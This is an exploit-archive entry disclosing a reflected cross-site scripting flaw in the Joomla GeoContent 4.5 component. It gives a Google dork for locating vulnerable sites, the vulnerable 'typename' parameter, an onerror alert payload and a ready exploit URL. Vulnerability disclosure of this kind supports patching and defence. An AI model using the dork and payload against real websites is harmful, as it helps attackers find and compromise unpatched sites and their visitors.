Joomla GeoContent 4.5 Component - Cross-site scripting Vulnerability

2017-02-14T00:00:00
ID 1337DAY-ID-27002
Type zdt
Reporter Mojtaba MobhaM
Modified 2017-02-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Joomla Component GeoContent 4.5 - Cross-site scripting
# Date: 2017-02-13
# Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/geocontent/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM ([email protected])
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_geocontent
# Tested on: Windows

# POC :
# typename Parameter Vulnerable to Cross-site scripting
# Payload : <img src="1" onerror=alert('XSS')>
# Exploit : http://www.Target.com/index.php?option=com_geocontent&task=layers.kml&typename=%3Cimg%20src=%221%22%20onerror=alert%28%27XSS%27%29%3E

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

#  0day.today [2018-01-04]  #